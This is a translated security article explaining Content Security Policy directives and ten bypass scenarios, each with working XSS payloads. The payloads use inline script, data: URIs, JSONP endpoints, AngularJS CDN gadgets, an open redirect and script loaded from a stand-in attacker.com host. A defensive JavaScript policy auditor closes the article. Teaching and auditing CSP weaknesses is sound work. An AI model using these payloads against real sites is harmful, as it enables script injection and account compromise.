FreeBuf.COM, network security industry portal: daily security news and technical analysis.
CSP Policy Principles && Bypass Methods
What CSP is
Content Security Policy (CSP) is a browser-enforced mechanism that defines which resources the current web page may load: scripts, images, iframes and so on. The rules are delivered in a response header or in an HTML meta tag, and the browser uses them to restrict or block loads the policy does not allow.
How CSP is used
CSP is widely deployed against content injection and is an effective mitigation for XSS, but it must be treated as defense in depth, not as the fix for an XSS bug: the injection still has to be removed at its source. A browser that does not enforce the standard Content-Security-Policy header (Internet Explorer, for example) gets no protection at all, and a weak policy is defeated even where it is enforced, as the bypass scenarios later in this article show.
How to set CSP
Via a response header:
Content-Security-Policy: default-src 'self'; script-src 'self' allowed.com; img-src 'self' allowed.com; style-src 'self';
Via a meta tag:
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
The header form is preferred: a meta policy only takes effect from the point in the document where it appears, and it cannot carry the frame-ancestors, report-uri or sandbox directives.
Common directives
script-src: where JavaScript may be loaded from. This covers both <script src=...> and inline script, including event handlers such as <img onerror=...>; inline code is blocked unless the directive explicitly allows it ('unsafe-inline', or a matching nonce or hash). This directive stops most malicious script loads.
default-src: the fallback for the other fetch directives; when a directive is not set, the browser uses the value given here.
child-src: sources allowed for web workers and nested browsing contexts (<frame>, <iframe>). In CSP3 worker-src and frame-src take precedence when set and child-src is their fallback.
connect-src: destinations that script may connect to: fetch(), XMLHttpRequest, WebSocket, EventSource and <a ping>.
frame-src: sources that may be loaded into frames.
img-src: sources that <img> may load from.
object-src: sources for <object>, <embed> and <applet>.
base-uri: the URLs the <base> element may set.
form-action: the destinations a form may be submitted to.
sandbox: enables a sandbox for the requested resource, like the <iframe> sandbox attribute. It restricts what the page can do, including blocking pop-ups, plugins and script execution, and places the content in a unique origin.
Common source values
*: wildcard; allows any URL except the data:, blob: and filesystem: schemes, which must be listed explicitly.
'self': allows resources from the page's own origin (same scheme, host and port), not merely the same domain.
data:: allows resources loaded through data: URLs; in script-src this is as permissive as allowing inline script.
'none': allows nothing from any source.
'unsafe-eval': allows eval(), Function() and string arguments to setTimeout()/setInterval().
'unsafe-hashes': allows hash sources to match specific inline event handlers.
'unsafe-inline': allows inline resources: inline <script> elements, javascript: URLs, inline event handlers and inline <style> elements.
'nonce-<value>': a script whitelist. The server generates a random value for every response, places it in the policy and in the nonce attribute of every <script> it intends to run; the browser executes a script only if the attribute matches the policy. The value must be unguessable and fresh per response, otherwise an attacker who learns it simply adds it to the injected tag.
Some usage examples
(excerpted from online sources)
Content-Security-Policy: default-src 'self'; script-src https://bhaveshthakur.com; report-uri /Report-parsing-url;
An <img> loaded from the same domain, bhaveshthakur.com: allowed, because img-src is not set and therefore falls back to default-src 'self'.
<script src=script.js>: allowed, because the script loads from the same domain, bhaveshthakur.com, which script-src lists.
<script src=https://evil.com/script.js>: blocked, because evil.com is not listed in script-src.
"/><script>alert(1337)</script>: also blocked. But why? There is no "inline-src" directive anywhere in the policy. Inline script is governed by script-src, and it runs only when that directive contains 'unsafe-inline' (or a nonce or hash matching the script); the script-src above contains neither, so the inline payload is refused.
Note the role of default-src 'self': every fetch directive that is not set itself inherits this value. The directives that fall back to default-src when they are not defined in the policy:
child-src connect-src font-src frame-src img-src manifest-src media-src object-src prefetch-src script-src script-src-elem script-src-attr style-src style-src-elem style-src-attr worker-src
Common bypass methods and ideas
Scenario 1: inline script is allowed ('unsafe-inline'):
Content-Security-Policy: script-src https://facebook.com https://google.com 'unsafe-inline' https://*; child-src 'none'; report-uri /Report-parsing-url;
Working payload: "/><script>alert(1337);</script>
(The https://* entry additionally allows a <script src> from any HTTPS host, so a remotely hosted payload works as well.)
Scenario 2: 'unsafe-eval' and data: in script-src:
Content-Security-Policy: script-src https://facebook.com https://google.com 'unsafe-eval' data: http://*; child-src 'none'; report-uri /Report-parsing-url;
Working payload:
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
(The base64 decodes to alert(document.domain). What lets this tag run is the data: scheme source, not 'unsafe-eval'; 'unsafe-eval' becomes the problem once an attacker controls a string that already-running code passes to eval(), Function() or a string argument of setTimeout().)
Scenario 3: wildcards in script-src:
Content-Security-Policy: script-src 'self' https://facebook.com https://google.com https: data: *; child-src 'none'; report-uri /Report-parsing-url;
Working payloads:
"/>'><script src=https://attacker.com/evil.js></script>
"/>'><script src=data:text/javascript,alert(1337)></script>
(https: allows script from any HTTPS host, data: allows data: URLs, and * allows everything except the data:, blob: and filesystem: schemes; the host whitelist in front of them is decoration.)
Scenario 4: neither object-src nor default-src is set:
Content-Security-Policy: script-src 'self'; report-uri /Report-parsing-url;
Because object-src has no explicit value and there is no default-src to fall back on, <object> and <embed> are unrestricted.
Working payloads:
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
(The base64 is <script>alert(1)</script>. The data: document runs in an opaque origin, so the alert fires but the script cannot read the embedding page's DOM or cookies.)
">'><object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
(The Flash payload depends on a plugin that current browsers no longer ship; it is kept for completeness.)
Scenario 5: combine a file upload with 'self'; upload a malicious script and load it from the same origin:
Content-Security-Policy: script-src 'self'; object-src 'none'; report-uri /Report-parsing-url;
Working payload:
"/>'><script src="/user_upload/mypic.png.js"></script>
('self' trusts every same-origin URL, so any endpoint that serves attacker-controlled bytes, such as an upload directory or a reflected JSON response, becomes a script source. The file only has to parse as JavaScript, but it must be served with a MIME type the browser accepts for scripts: current browsers refuse script responses typed image/*, audio/* or video/*, and X-Content-Type-Options: nosniff tightens this to JavaScript types only.)
Scenario 6: a JSONP endpoint on an allowed host:
Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none'; report-uri /Report-parsing-url;
Working payload:
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
(The endpoint echoes the callback parameter as code, so the response body starts with alert(...) and runs with the permission granted to the host. Every whitelisted host that exposes a JSONP endpoint has this problem.)
Scenario 7: a whole JavaScript CDN is allowed, so libraries hosted there become script gadgets:
Content-Security-Policy: script-src 'self' https://cdnjs.cloudflare.com/; object-src 'none'; report-uri /Report-parsing-url;
Working payloads:
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js"></script>
<div ng-app ng-csp>
{{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
</div>
"><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
"><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
(All three chains load AngularJS from the allowed host and let it evaluate attacker-written template expressions; ng-csp makes Angular work without eval(). The first uses the curry method that prototype.js adds to Function.prototype to obtain window and call its eval; the second reaches the Function constructor through $eval.constructor; the third reaches window through the view property of the DOM click event. Old AngularJS builds without an expression sandbox (1.0.x, 1.1.x) are chosen for exactly that reason.)
Scenario 8: ajax.googleapis.com is allowed; use the AngularJS gadget and a JSONP endpoint on the same host:
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none'; report-uri /Report-parsing-url;
Working payloads:
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
(The Google Feed API used by the second payload has since been retired and no longer serves JSONP; the lesson stands: allowing an entire CDN host allows every gadget library and JSONP endpoint on it.)
Scenario 9: path restrictions are not enforced after a redirect:
Content-Security-Policy: script-src 'self' accounts.google.com/random/ website.with.redirect.com; object-src 'none'; report-uri /Report-parsing-url;
CSP compares the path of a source expression only for the initial request. Once the response redirects, the browser checks only scheme, host and port of the new URL against the list (otherwise a policy could be used to probe where redirects lead). So the allowed open redirector website.with.redirect.com turns accounts.google.com/random/ into all of accounts.google.com, including its JSONP endpoint.
Working payload:
">'><script src="https://website.with.redirect.com/redirect?url=https%3A//accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
Scenario 10: load the payload through an iframe:
Content-Security-Policy: default-src 'self' data: *; connect-src 'self'; script-src 'self'; report-uri /_csp; upgrade-insecure-requests
Working payloads:
<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
* sometimes it can be achieved using the defer and async attributes of a script inside the iframe (in current browsers this usually fails, but it costs nothing to try):
<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>
(What makes these fail today is policy inheritance rather than the same-origin policy: srcdoc, about:blank and data: frames inherit the embedding page's CSP, so script-src 'self' applies inside the frame too, and a data: frame additionally has an opaque origin with no access to the parent document. The real mistake in the header is frame-src falling back to default-src 'self' data: *, which lets attacker-controlled content be framed in the first place.)
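To make the rules behind the examples checkable rather than memorised, here is an added example (not from the article, not a browser's implementation): a compact CSP evaluator in JavaScript that parses a header, applies the default-src fallback from the usage example, matches a URL against 'self', scheme, host and path sources, models the rule from scenario 9 that the path part is only compared before a redirect, and audits a policy for the patterns that scenarios 1 to 9 depend on. The page origin https://bhaveshthakur.com/ used in the usage note is taken from the examples above; the functions and their names are assumptions of this example.

```javascript
// Added example (not from the article): a minimal CSP evaluator for the policies discussed.

// Fetch directives that inherit default-src when they are not set themselves.
const FALLS_BACK_TO_DEFAULT = new Set([
  'child-src', 'connect-src', 'font-src', 'frame-src', 'img-src', 'manifest-src',
  'media-src', 'object-src', 'prefetch-src', 'script-src', 'script-src-elem',
  'script-src-attr', 'style-src', 'style-src-elem', 'style-src-attr', 'worker-src',
]);
const DEFAULT_PORT = { 'http:': '80', 'https:': '443' };

// "name src src; name src" -> Map(name -> [src...]); a repeated directive is ignored, as browsers do.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name && !policy.has(name.toLowerCase())) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Source list governing a directive, or null when nothing restricts it (scenario 4).
function effectiveSources(policy, directive) {
  if (policy.has(directive)) return policy.get(directive);
  if (FALLS_BACK_TO_DEFAULT.has(directive) && policy.has('default-src')) return policy.get('default-src');
  return null;
}

function hostMatches(pattern, host) {
  if (pattern === '*') return true;
  if (pattern.startsWith('*.')) return host.endsWith(pattern.slice(1));
  return pattern === host;
}

// Does one source expression match `url` for a page at `page`? After a redirect
// only scheme, host and port are compared; the path part is dropped (scenario 9).
function sourceMatches(src, url, page, redirected) {
  const s = src.toLowerCase();
  if (s === "'self'") return url.origin !== 'null' && url.origin === page.origin;
  if (s.startsWith("'")) return false; // 'none', 'unsafe-*', nonces and hashes never match a URL
  if (s === '*') return !['data:', 'blob:', 'filesystem:'].includes(url.protocol);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s || (s === 'http:' && url.protocol === 'https:');
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*|(?:\*\.)?[^/:*]+)(?::(\d+|\*))?(\/[^?#]*)?$/);
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  const wantScheme = scheme ? `${scheme}:` : page.protocol;
  if (url.protocol !== wantScheme && !(wantScheme === 'http:' && url.protocol === 'https:')) return false;
  if (!hostMatches(host, url.hostname)) return false;
  if (port && port !== '*' && port !== (url.port || DEFAULT_PORT[url.protocol] || '')) return false;
  if (path && !redirected && (path.endsWith('/') ? !url.pathname.startsWith(path) : url.pathname !== path)) return false;
  return true;
}

// Would `header` let `directive` fetch `resourceUrl` from a page at `pageUrl`?
function allows(header, directive, pageUrl, resourceUrl, opts = {}) {
  const sources = effectiveSources(parseCsp(header), directive);
  if (sources === null) return true;
  const page = new URL(pageUrl);
  const url = new URL(resourceUrl, pageUrl);
  return sources.some(s => sourceMatches(s, url, page, Boolean(opts.redirected)));
}

// Inline <script> and event handlers need 'unsafe-inline'; a nonce or hash in the same directive switches it off.
function allowsInlineScript(header) {
  const sources = effectiveSources(parseCsp(header), 'script-src');
  if (sources === null) return true;
  const lower = sources.map(s => s.toLowerCase());
  const hasNonceOrHash = lower.some(s => /^'(nonce|sha(256|384|512))-/.test(s));
  return lower.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// Flags the policy patterns that the bypass scenarios above depend on.
function audit(header) {
  const policy = parseCsp(header);
  const findings = [];
  const script = effectiveSources(policy, 'script-src');
  if (script === null) findings.push('script-src: unrestricted (no script-src and no default-src)');
  else {
    if (allowsInlineScript(header)) findings.push("script-src: 'unsafe-inline' lets injected inline script run (scenario 1)");
    for (const s of script.map(x => x.toLowerCase())) {
      if (s === "'unsafe-eval'") findings.push("script-src: 'unsafe-eval' lets eval()/Function() run attacker strings (scenario 2)");
      else if (s === 'data:') findings.push('script-src: data: allows <script src=data:...> (scenarios 2 and 3)');
      else if (s === '*' || /^https?:$/.test(s) || /^(https?:\/\/)?\*$/.test(s)) findings.push(`script-src: ${s} allows script from any host (scenario 3)`);
      else if (s.startsWith("'") || /^[a-z][a-z0-9+.-]*:$/.test(s)) continue;
      else if (/^(?:[a-z]+:\/\/)?[^/]+\/./.test(s)) findings.push(`script-src: path in ${s} is ignored after a redirect (scenario 9)`);
      else findings.push(`script-src: whole host ${s} allowed; check it for JSONP endpoints and AngularJS/prototype.js builds (scenarios 6 to 8)`);
    }
  }
  if (effectiveSources(policy, 'object-src') === null) findings.push('object-src: unrestricted, <object>/<embed> payloads work (scenario 4)');
  return findings;
}
```

Usage: audit("script-src 'self' accounts.google.com/random/ website.with.redirect.com; object-src 'none'") reports the path entry and the whole-host entry, and allows(thatPolicy, 'script-src', 'https://bhaveshthakur.com/', 'https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)', { redirected: true }) returns true while the same call without the redirect flag returns false. The evaluator deliberately omits nonce and hash matching of inline content and the CSP3 strict-dynamic rules, which is why the nonce example earlier in this article is kept separate.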